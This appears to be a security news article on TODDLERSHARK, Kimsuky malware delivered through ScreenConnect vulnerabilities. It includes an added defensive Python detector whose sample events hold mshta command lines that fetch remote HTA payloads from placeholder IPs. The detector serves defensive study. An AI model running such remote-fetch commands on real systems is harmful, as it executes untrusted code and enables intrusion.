TODDLERSHARK Malware


Cybersecurity experts have identified a new malware named TODDLERSHARK, deployed by North Korean threat actors who took advantage of recently revealed security vulnerabilities in ConnectWise ScreenConnect. A report indicates that TODDLERSHARK shares similarities with previously known Kimsuky malware, including BabyShark and ReconShark.

The threat actors gained access to the victim's workstation by exploiting vulnerabilities in the ScreenConnect application's setup wizard. With this 'hands-on keyboard' access, they used cmd.exe to execute mshta.exe with a URL argument pointing to the Visual Basic (VB) based malware.
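A defender-side illustration of the launch chain just described, added here as an example and not taken from the original report: the Sysmon-style process-creation records, the placeholder URL and the regular expression are constructed assumptions. The detector flags mshta.exe when it is invoked with a remote URL and raises severity when its parent is cmd.exe, while leaving a local .hta launch alone.

```python
import re

# Constructed Sysmon Event ID 1-style process-creation records (not real telemetry).
# IPs are from documentation ranges; the .hta filename is a placeholder.
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://198.51.100.7/PLACEHOLDER.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Tools\local_app.hta"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://203.0.113.9/update"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\whoami.exe",
     "CommandLine": "whoami"},
]

# Remote resource passed on the command line (assumed URL shape).
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://[^\s\"']+")

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev: dict):
    """Return (severity, reason), or None when the event is not of interest.

    Pattern from the TODDLERSHARK intrusion: mshta.exe launched with a URL,
    from an interactive cmd.exe session. mshta with only a local .hta path is
    treated as benign here (assumption: legitimate local HTAs exist on the host).
    """
    if _basename(ev["Image"]) != "mshta.exe":
        return None
    m = URL_RE.search(ev["CommandLine"])
    if not m:
        return None
    if _basename(ev["ParentImage"]) == "cmd.exe":
        return ("high", f"cmd.exe -> mshta.exe fetching remote HTA: {m.group(0)}")
    return ("medium", f"mshta.exe fetching remote content: {m.group(0)}")

def detect(events):
    """Return (index, severity, reason) for each suspicious event."""
    hits = []
    for i, ev in enumerate(events):
        res = score_event(ev)
        if res:
            hits.append((i, *res))
    return hits

if __name__ == "__main__":
    for idx, sev, why in detect(EVENTS):
        print(f"[{sev.upper()}] event {idx}: {why}")
```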

The vulnerabilities at the center of the ConnectWise security concerns are CVE-2024-1708 and CVE-2024-1709. Since these vulnerabilities were disclosed, multiple threat actors have exploited them extensively, using them to distribute a range of malicious payloads, including cryptocurrency miners, ransomware, Remote Access Trojans (RATs), and stealer malware.

The Kimsuky Cybercriminals are Among the Most Active

The Kimsuky Advanced Persistent Threat (APT) group, recognized by various aliases such as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has consistently expanded its repertoire of malware tools. Among the latest additions are GoBear and Troll Stealer.

First identified in late 2018, BabyShark was initiated through an HTML Application (HTA) file. Upon execution, this VB script malware extracts system information and sends it to a Command-and-Control (C2) server. Additionally, BabyShark establishes persistence on the system, awaiting further instructions from the operator.

In May 2023, a variant of BabyShark, named ReconShark, was detected. It was delivered through spear-phishing emails, specifically targeting individuals, showcasing the APT group's ongoing evolution and adaptability in their cyber operations.

The TODDLERSHARK Malware is Believed to be an Evolution of Previous Kimsuky Threats

TODDLERSHARK is considered the latest iteration of the same malware, evident from both code and behavioral resemblances. Apart from utilizing a scheduled task for maintaining persistence, the malware is designed to effectively capture and transmit sensitive information from compromised hosts, functioning as a valuable reconnaissance tool.

TODDLERSHARK demonstrates characteristics of polymorphic behavior, manifested through alterations in identity strings within its code, shifting the position of code through generated junk code, and employing uniquely generated Command and Control (C2) URLs. These features contribute to the potential challenge of detecting this malware in certain environments.

Measures Recommended by Cybersecurity Researchers against the TODDLERSHARK Malware

To enhance the security of systems running ConnectWise ScreenConnect versions 23.9.7 and earlier, immediate action is essential. Following the guidelines outlined in the ConnectWise advisory is crucial to address potential compromises. It is imperative to prioritize the protection and monitoring of systems, particularly those accessible on the Internet. This can be achieved by deploying an endpoint detection and response (EDR) or anti-malware tool specifically configured to conduct thorough system scans for webshells.

Additionally, the implementation or configuration of a Web Application Firewall (WAF) or a comparable web traffic monitoring system is recommended. This measure facilitates real-time analysis, offering enhanced detection capabilities in the event of potential exploitation, contributing to a more robust and resilient security infrastructure.
